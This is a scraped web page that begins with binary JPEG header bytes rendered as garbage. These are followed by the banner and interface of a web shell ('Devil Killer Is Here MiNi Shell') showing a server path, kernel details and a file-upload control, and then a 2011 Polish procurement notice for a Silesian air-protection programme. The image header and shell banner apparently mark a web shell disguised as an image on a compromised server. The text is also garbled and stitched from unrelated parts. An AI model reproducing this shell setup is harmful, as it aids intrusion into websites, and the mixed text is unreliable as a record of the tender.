JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110302/70249-N-2011.html

<p class="kh_header"><b>Katowice: Opracowanie dokumentu pn. Program ochrony powietrza dla stref gliwicko-mikołowskiej i częstochowsko-lublinieckiej województwa śląskiego, w których stwierdzone zostały ponadnormatywne poziomy substancji w powietrzu</b><br>
<b>Numer ogłoszenia: 70249 - 2011; data zamieszczenia: 02.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Śląskie , ul. Ligonia 46, 40-037 Katowice, woj. śląskie, tel. 32 2078562, faks 32 2078578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentu pn. Program ochrony powietrza dla stref gliwicko-mikołowskiej i częstochowsko-lublinieckiej województwa śląskiego, w których stwierdzone zostały ponadnormatywne poziomy substancji w powietrzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentu pn. Program ochrony powietrza dla stref gliwicko-mikołowskiej i częstochowsko-lublinieckiej województwa śląskiego, w których stwierdzone  zostały ponadnormatywne poziomy substancji w powietrzu, zwanego dalej Programem, obejmującego etap opracowania projektu dokumentu, procedurę opiniowania, korektę i uzupełnienie projektu dokumentu, a także wydruk ostatecznej wersji Programu w treści przyjętej przez Sejmik Województwa Śląskiego, promocję uchwalonego dokumentu, jak również uaktualnienie i uzupełnienie danych oraz uzupełnienie oprogramowania wojewódzkiej elektronicznej bazy emisji a także sporządzenie systemu umożliwiającego stały monitoring wdrażania i skuteczności Programu. Dostarczane dane winny być przedstawione w formacie umożliwiającym ich odczytywanie, edycję i analizę przez powszechnie dostępne narzędzia bazodanowe i GIS.
2. Program winien uwzględniać:
2.1. Strefy, w których stwierdzono przekroczenie dopuszczalnego poziomu pyłu zawieszonego PM 10:
a) strefę gliwicko-mikołowską;
b) strefę częstochowsko-lubliniecką;
2.2. Obszar całego województwa - przy sporządzaniu sprawozdania i określaniu planu działań krótkoterminowych.
3. Głównym celem opracowanego Programu jest wskazanie kierunków działań oraz konkretnych zadań, których realizacja umożliwi osiągnięcie i utrzymanie dopuszczalnego poziomu pyłu PM 10.
4. Zamówienie realizowane będzie w trzech etapach:
4.1. Etap I  
a) Organizacja i przeprowadzenie: 
- minimum 5 spotkań informacyjnych m. in. dla przedstawicieli samorządów województwa śląskiego oraz społeczeństwa w strefach, dla których został opracowany i przyjęty Program ochrony powietrza zgodnie z uchwałą Nr III/5/15/2010 Sejmiku Województwa Śląskiego, 
- minimum 1 wstępnego spotkania informacyjnego m. in. dla przedstawicieli zainteresowanych organów, gmin i starostw, a także społeczeństwa - prezentacja założeń do przygotowywanego dokumentu Programu,
- minimum 1 spotkania osób, będących autorytetami z dziedziny ochrony powietrza, którzy zostaną zaangażowani w tworzenie Programu;
b) Opracowanie projektu Programu, zawierającego ekspertyzę prawną, przedstawiającą możliwości wprowadzenia w poszczególnych strefach województwa śląskiego konkretnych egzekwowalnych nakazów i zakazów, dotyczących osób fizycznych i prawnych, pozwalających ograniczyć emisję zanieczyszczeń do powietrza, w tym planu działań krótkoterminowych oraz wprowadzenie korekt i uzupełnień uzgodnionych z Zamawiającym i dostarczenie ostatecznej wersji projektu Zamawiającemu (celem przedłożenia wraz z projektami uchwał na Zarząd Województwa Śląskiego) w celu uzyskania wstępnej akceptacji przedmiotu zamówienia. Opracowany dokument powinien zawierać sprawozdanie z realizacji wcześniejszych programów ochrony powietrza dla całego województwa śląskiego oraz plan działań krótkoterminowych. 
Etap ten obejmuje także wykonanie i przedłożenie Zamawiającemu projektu szczegółowej pisemnej analizy zasadności wykonania prognozy oddziaływania na środowisko w ramach strategicznej oceny oddziaływania na środowisko celem przedłożenia jej do Regionalnej Dyrekcji Ochrony Środowiska wraz z projektem opracowywanego Programu, oraz przygotowywanie:
- zaproszeń do osób będących autorytetami a także powiadomień, ogłoszeń i pism przewodnich do zainteresowanych organów, gmin, starostw, internetu, prasy, radia i telewizji (celem powiadomienia o przystąpieniu do opracowywania projektu Programu oraz o organizowanych spotkaniach) zgodnie z pkt E.3 i E.4 załącznika nr 1 do siwz,
- informacji i prezentacji na organizowane spotkania,
- sprawozdań ze zorganizowanych spotkań oraz listy obecności na spotkaniach.
4.2. Etap II - Przeprowadzenie procedury konsultacji społecznych oraz poddanie strategicznej ocenie oddziaływania na środowisko, a także sporządzenie korekty uwzględniającej zasadne uwagi zgłoszone w procesie konsultacji społecznych jak również opiniowania przez Zarząd Województwa. Opracowany i zaakceptowany przez Zarząd Województwa projekt Programu wraz ze stosownymi projektami uchwał Sejmiku wymaga zaopiniowania przez właściwych starostów;
Etap ten obejmuje także zorganizowanie minimum 1 spotkania autorytetów oraz opracowanie i przedłożenie Zamawiającemu:
- prognozy oddziaływania na środowisko - elementu strategicznej oceny oddziaływania na środowisko (przepisy działu IV ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.)) - jeśli Regionalna Dyrekcja Ochrony Środowiska w Katowicach stwierdzi taką potrzebę po analizie dostarczonych materiałów, w tym pełna współpraca z RDOŚ (przygotowywanie odpowiedzi na kierowane zapytania, uzupełnianie dokumentacji, udział w organizowanych przez RDOŚ spotkaniach itp.),
- szczegółowej pisemnej analizy uwag, wniosków i zapytań wniesionych w trakcie ww. procedur, w tym udzielenie na nie odpowiedzi. Wprowadzenie do projektu Programu zasadnych uwag i wniosków może nastąpić po akceptacji treści analizy przez Zamawiającego - w tym naniesieniu korekt i uzupełnień,
- hasła promującego  Program, celem wykorzystania w materiałach informacyjnych i promocyjnych. 
Udział społeczeństwa w postępowaniu należy zapewnić zgodnie z art. 91 ust. 9 ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska - tekst jednolity Dz. U. z 2008 r. Nr 25, poz. 150 z późn. zm.). W ramach tej procedury Wykonawca winien zorganizować i przeprowadzić min. 4 spotkania konsultacyjne z udziałem zainteresowanych organów, przedstawicieli samorządów i społeczeństwa oraz przygotować:
- zaproszenia dla osób będących autorytetami a także powiadomienia, ogłoszenia i pisma przewodnie do zainteresowanych organów, gmin, starostw, internetu, prasy, radia i telewizji, zgodnie z pkt E.3 i E.4 załącznika nr 1 do siwz (celem powiadomienia o opracowaniu projektu Programu i miejscu jego wyłożenia, organizowanych spotkaniach, możliwości zapoznania się z przygotowanym  dokumentem, sposobie i miejscu składania uwag i wniosków ze wskazaniem co najmniej 21 dniowego terminu ich składania, organie właściwym do składania uwag i wniosków),
- informacji i prezentacji na organizowane spotkania,
- sprawozdania ze zorganizowanych spotkań oraz listy obecności na spotkaniach.
4.3. Etap III - Przygotowanie projektu Programu do przedłożenia Komisji Środowiska i Gospodarki Wodnej Sejmiku Województwa Śląskiego oraz ostatecznej wersji do przyjęcia przez Sejmik Województwa Śląskiego.
Etap ten obejmuje również wypełnienie arkuszy derogacyjnych, jeśli w tym czasie będzie to uzasadnione.
Po podjęciu uchwały przez Sejmik Województwa Śląskiego dostarczenie:
a) 25 egzemplarzy przedmiotu zamówienia - Programu w formie książkowej formatu A4 w wersji przyjętej przez Sejmik Województwa Śląskiego;
b) 250 egzemplarzy Programu w formie elektronicznej (płyty CD lub DVD);
c) wypełnionych arkuszy derogacyjnych jeśli będzie uzasadnione ich wypełnienie - w formie pisemnej oraz elektronicznej (płyty CD lub DVD);
d) zestawienia informacji, o których mowa w § 6 ust. 2 pkt 3 rozporządzenia Ministra Środowiska z dnia 19 listopada 2008 r. w sprawie zakresu i sposobu przekazywania informacji dotyczących zanieczyszczenia powietrza (5 egzemplarzy w wersji drukowanej i 5 egzemplarzy w wersji elektronicznej na płytach CD lub DVD - w wersji zaakceptowanej przez Zamawiającego);
e) licencji na aktualizację programów ArcView zainstalowanych w wersji 9.2 na trzech stanowiskach, wraz z uzupełnieniem wszystkich danych źródłowych i wprowadzeniem wytworzonych danych (efekt końcowy prac nad Programem) oraz połączeniem tych danych z danymi zawartymi w Wojewódzkiej Bazie Emisji i naniesieniem na mapy topograficzne w skali 1:50 000 z zaznaczeniem obszarów przekroczeń w powietrzu pyłu PM10;
f) materiałów informacyjnych, promocyjnych i edukacyjnych.
Etap ten obejmuje także przeszkolenie trzech wskazanych pracowników Urzędu Marszałkowskiego Województwa Śląskiego w obsłudze i możliwościach wykorzystania Wojewódzkiej Bazy Emisji przy użyciu uaktualnionego programu ArcView;
5. Wszystkie etapy będą przekazywane i odbierane protokołami zdawczo-odbiorczymi.
6. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.
7. Warunki realizacji zamówienia zawarte są we wzorze umowy stanowiącym załącznik nr 3 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.73.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.    
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ww. warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 usługi o wartości min. 200 000,00 zł brutto każda, obejmujące wykonanie ekspertyz, planów lub programów dotyczących jakości powietrza.
Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów wymienionych w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ww. warunek spełniają łącznie.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do  dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.    
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ww. warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww. warunku, jeżeli Wykonawca wykaże, że przy wykonywaniu zamówienia uczestniczyć będzie co najmniej 5 osób, w tym: 
1) jedna osoba, która posiada:
- wykształcenie wyższe; 
- doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum 3 ekspertyz, planów lub programów dotyczących jakości powietrza z zakresu inżynierii środowiska,
2) jedna osoba, która posiada:
- wykształcenie wyższe; 
- doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum 3 ekspertyz, planów lub programów dotyczących jakości powietrza z zakresu klimatologii meteorologii i prognozowania jakości powietrza,
3) jedna osoba, która posiada:
- wykształcenie wyższe; 
- doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum 3 ekspertyz, planów lub programów dotyczących jakości powietrza z zakresu modelowania rozprzestrzeniania zanieczyszczeń w powietrzu atmosferycznym, 
4) jedna osoba, która posiada:
- wykształcenie wyższe prawnicze; 
- doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert co najmniej 3 opinii lub ekspertyz prawnych z zakresu ochrony środowiska,
5) jedna osoba, która posiada:
- wykształcenie wyższe w specjalności ekonomiki i ochrony środowiska lub ukończone studia podyplomowe z tego zakresu;  
- doświadczenie w wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert co najmniej 3 opinii lub ekspertyz z zakresu ekonomiki i ochrony środowiska.
Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów wymienionych w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ww. warunek spełniają łącznie.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do  dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.    
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ww. warunek spełniają łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca polega na wiedzy i doświadczeniu i osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dokumenty i oświadczenia, wymienione w pkt III.4.1) składają w taki sposób, aby potwierdzały łączne spełnianie warunków, o których mowa w pkt III.3). Dokumenty i oświadczenia, o których mowa w pkt III.4.2) składa odrębnie każdy z Wykonawców występujących wspólnie.
3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4. Wszystkie dołączone dokumenty, winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt III.4.2) kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów powinny być poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.
6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w sprawie zamówienia publicznego w sytuacji, gdy konieczność ich wprowadzenia wynika ze zmian w normach lub przepisach powszechnie obowiązujących, a dotyczących przedmiotu umowy, przy czym ewentualne zmiany kosztów obciążają Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.slaskie.pl/index.php?grupa=2&id_menu=90<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Śląskiego,
Wydział Zamówień Publicznych i Nadzoru Właścicielskiego,
ul. Ligonia 46,
40-037 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Śląskiego,
Kancelaria Ogólna p.164,
ul. Ligonia 46,
40-037 Katowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy wykażą brak podstaw do wykluczenia z postępowania o udzielenie zamówienia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych.
